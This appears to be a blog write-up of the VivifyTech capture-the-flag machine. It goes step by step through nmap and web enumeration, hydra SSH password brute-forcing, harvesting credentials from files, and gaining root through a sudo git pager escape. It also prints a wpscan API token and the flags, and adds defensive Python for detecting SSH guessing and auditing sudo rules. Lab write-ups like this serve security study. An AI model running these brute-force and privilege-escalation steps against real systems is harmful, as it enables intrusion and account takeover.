VivifyTech
⏲️ Release Date // 2023-12-28
✔️ MD5 // d8d796aa8ac7998128f555f3c61360a5
☠ Root // 115
💀 User // 112
Host discovery and nmap scanning
Host discovery
nmap -sn 192.168.56.0/24
Full port scan
nmap -sT --min-rate 10000 -p- 192.168.56.126
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx
Targeted port scan (detailed scan of the open ports)
nmap -sT -sV -sC -O -p22,80,3306,33060 192.168.56.126
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns:
|     Invalid message-frame."
|_    HY000
Web penetration
Visit the web page
It is only the Apache default page.
Directory scanning
gobuster dir -u http://192.168.56.126 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Found:
/wordpress      (Status: 301) [Size: 320] [--> http://192.168.56.126/wordpress/]
/server-status  (Status: 403) [Size: 279]
WordPress 6.4.1 has no readily exploitable vulnerabilities.
Use wpscan
wpscan --url http://192.168.56.126/wordpress/ --api-token aSaeIFrptoJuKIRRxPteXnJo7lZU8eDtJEKXxMV1RAw -e u
Enumerate users:
[+] sancelisso
dirb directory scan
dirb http://192.168.56.126 /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster directory scan
feroxbuster -u http://192.168.56.126 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 5 --filter-status 404,403
The wp-admin login page has no weak password.
Check the wp-includes directory
A file is found:
http://192.168.56.126/wordpress/wp-includes/secrets.txt
agonglo
tegbesou
paparazzi
womenintech
Password123
These should be passwords.
Try brute-forcing the backend login
wpscan --url http://192.168.56.126/wordpress/ -U sancelisso -P pass
Nothing.
Try to find more information
Found this post
It gives several names:
sarah
mark
emily
jake
alex
Try the backend login again
wpscan --url http://192.168.56.126/wordpress/ -U user -P pass
Still no result.
Logging in to the SSH service
The backend login got nowhere, so try SSH instead.
hydra -L user -P pass ssh://192.168.56.126
[22][ssh] host: 192.168.56.126 login: sarah password: bohicon
Got a set of credentials:
sarah:bohicon
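The credential above was obtained by password guessing over SSH, so this is the detection side of that step, as an added example that is not part of the original write-up. It parses the standard OpenSSH auth.log line format and flags a source address that fails many logins in a short window, and a successful login from a source that was guessing moments before (the "hydra found a hit" pattern). The log lines, the hostname and the source address 192.168.56.101 are constructed for the example; the usernames are the ones enumerated above.

```python
"""Detect SSH password-guessing bursts in OpenSSH auth.log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failures from one host, then one success,
# then an unrelated key-based login from another host.
SAMPLE_LOG = """\
Dec  5 17:40:01 VivifyTech sshd[1201]: Failed password for sarah from 192.168.56.101 port 50102 ssh2
Dec  5 17:40:01 VivifyTech sshd[1202]: Failed password for mark from 192.168.56.101 port 50103 ssh2
Dec  5 17:40:02 VivifyTech sshd[1203]: Failed password for invalid user emily from 192.168.56.101 port 50104 ssh2
Dec  5 17:40:02 VivifyTech sshd[1204]: Failed password for jake from 192.168.56.101 port 50105 ssh2
Dec  5 17:40:03 VivifyTech sshd[1205]: Failed password for alex from 192.168.56.101 port 50106 ssh2
Dec  5 17:40:03 VivifyTech sshd[1206]: Failed password for sarah from 192.168.56.101 port 50107 ssh2
Dec  5 17:40:04 VivifyTech sshd[1207]: Accepted password for sarah from 192.168.56.101 port 50108 ssh2
Dec  5 17:55:10 VivifyTech sshd[1300]: Accepted publickey for sarah from 192.168.56.1 port 40001 ssh2
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>" lines sshd writes.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line):
    """Return a dict for an auth outcome line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog stamps carry no year; only relative ordering matters here.
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts: one per source that crosses `threshold` failures inside
    `window`, and one per successful login that follows recent failures."""
    failures = defaultdict(list)   # ip -> timestamps of failures still inside the window
    fired = set()                  # sources already reported for guessing
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        recent = [t for t in failures[ip] if ev["ts"] - t <= window]
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            failures[ip] = recent
            if len(recent) >= threshold and ip not in fired:
                fired.add(ip)
                alerts.append({"type": "password_guessing", "ip": ip, "count": len(recent)})
        elif recent:
            # A success right after a burst of failures is the one worth paging on.
            alerts.append({"type": "success_after_failures", "ip": ip,
                           "user": ev["user"], "method": ev["method"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The second alert type is the important one: a burst of failures alone is background noise on any exposed SSH port, but a success from the same source within the window means a guessed password is now in use and that account should be locked and re-credentialed.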
sarah@VivifyTech:~$ ls -la
total 36
drwx------ 4 sarah sarah 4096 May 27 08:56 .
drwxr-xr-x 6 root  root  4096 Dec  5 16:00 ..
-rw------- 1 sarah sarah    0 Dec  5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah  245 Dec  5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec  5 17:48 .bashrc
-rw------- 1 sarah sarah    0 May 27 08:56 .history
drwxr-xr-x 3 sarah sarah 4096 Dec  5 16:19 .local
-rw------- 1 sarah sarah  104 May 27 08:32 .mysql_history
drwxr-xr-x 2 sarah sarah 4096 Dec  5 16:19 .private
-rw-r--r-- 1 sarah sarah  807 Dec  5 15:57 .profile
-rw-r--r-- 1 sarah sarah   27 Dec  5 16:22 user.txt
sarah@VivifyTech:~$ cat user.txt
HMV{Y0u_G07_Th15_0ne_6543}
sarah@VivifyTech:~$ cd .private/
sarah@VivifyTech:~/.private$ ls
Tasks.txt
sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him
- gbodja:4Tch055ouy370N
This yields another credential:
gbodja:4Tch055ouy370N
Privilege escalation
git privilege escalation
Use git's diff tool to read root.txt (a blind guess at the path).
gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !admin_flag, use_pty

User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git
gbodja@VivifyTech:~$ sudo git diff /dev/null /root/root.txt
diff --git a/root/root.txt b/root/root.txt
new file mode 100644
index 0000000..9b04236
--- /dev/null
+++ b/root/root.txt
@@ -0,0 +1 @@
+HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
Getting a root shell through git
sudo git -p help config
Then, at the pager prompt, type !/bin/bash
HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
Got root.txt.
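The root cause here is a sudoers rule that lets an unprivileged user run git as root without a password. Below is an added example, not part of the original write-up, of the audit a defender would run over `sudo -l` output: it parses the text layout sudo prints (the Defaults block, then the "User ... may run the following commands" list), and flags rules granting ALL, rules tagged NOPASSWD, and rules for tools that hand control to a pager or editor unless they carry sudo's NOEXEC tag. The SUDO_L_OUTPUT string copies the layout shown above; HARDENED_OUTPUT and the contents of SHELL_CAPABLE are constructed for the example.

```python
"""Audit `sudo -l` output for rules that give away more than intended (added example)."""
import re

# Tools whose normal operation hands control to a pager or editor from which a
# shell can be started. git is the one on this box; the set is illustrative and
# should be extended to match the tools present on your own hosts.
SHELL_CAPABLE = {"git", "less", "more", "man", "vi", "vim"}

# Copied from the `sudo -l` output in the write-up.
SUDO_L_OUTPUT = r"""Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    !admin_flag, use_pty

User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git
"""

# Constructed: a password-protected rule with the NOEXEC tag and a fixed subcommand.
HARDENED_OUTPUT = """User gbodja may run the following commands on VivifyTech:
    (root) NOEXEC: /usr/bin/git diff
"""

# One rule line: "(runas) TAG: TAG: command[, command ...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as a list of dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        if not in_rules:
            continue                 # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in re.findall(r"[A-Z]+:", m["tags"])}
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"].strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def audit(rules):
    """Return findings as dicts with cmd, severity and a one-line reason."""
    findings = []
    for r in rules:
        cmd, runas = r["cmd"], r["runas"]
        if cmd == "ALL":
            findings.append({"cmd": cmd, "severity": "high",
                             "why": f"every command may run as ({runas})"})
            continue
        base = cmd.split()[0].rsplit("/", 1)[-1]   # /usr/bin/git diff -> git
        if "NOPASSWD" in r["tags"]:
            findings.append({"cmd": cmd, "severity": "high",
                             "why": "no authentication required"})
        if base in SHELL_CAPABLE:
            if "NOEXEC" not in r["tags"]:
                findings.append({"cmd": cmd, "severity": "high",
                                 "why": f"{base} can open a pager/editor that spawns a shell as ({runas}); "
                                        "add the NOEXEC: tag or remove the rule"})
            else:
                findings.append({"cmd": cmd, "severity": "medium",
                                 "why": f"NOEXEC blocks child processes, but {base} still reads and "
                                        f"writes arbitrary paths as ({runas})"})
    return findings


if __name__ == "__main__":
    for label, text in (("current", SUDO_L_OUTPUT), ("hardened", HARDENED_OUTPUT)):
        print(label)
        for f in audit(parse_sudo_l(text)):
            print(f"  [{f['severity']}] {f['cmd']}: {f['why']}")
```

sudoers(5) documents the NOEXEC tag, which stops the command from executing child processes and so closes the pager route shown above. The audit still reports the hardened rule at medium severity because `git diff /dev/null /root/root.txt` needs no child process at all; a tool that reads and writes paths as root cannot be made safe with tags, only replaced by a wrapper script that fixes the repository and arguments.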
Author: C0rr3ct
Link: https://www.cnblogs.com/C0rr3ct/p/18216604
License: This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 2.5 China Mainland License.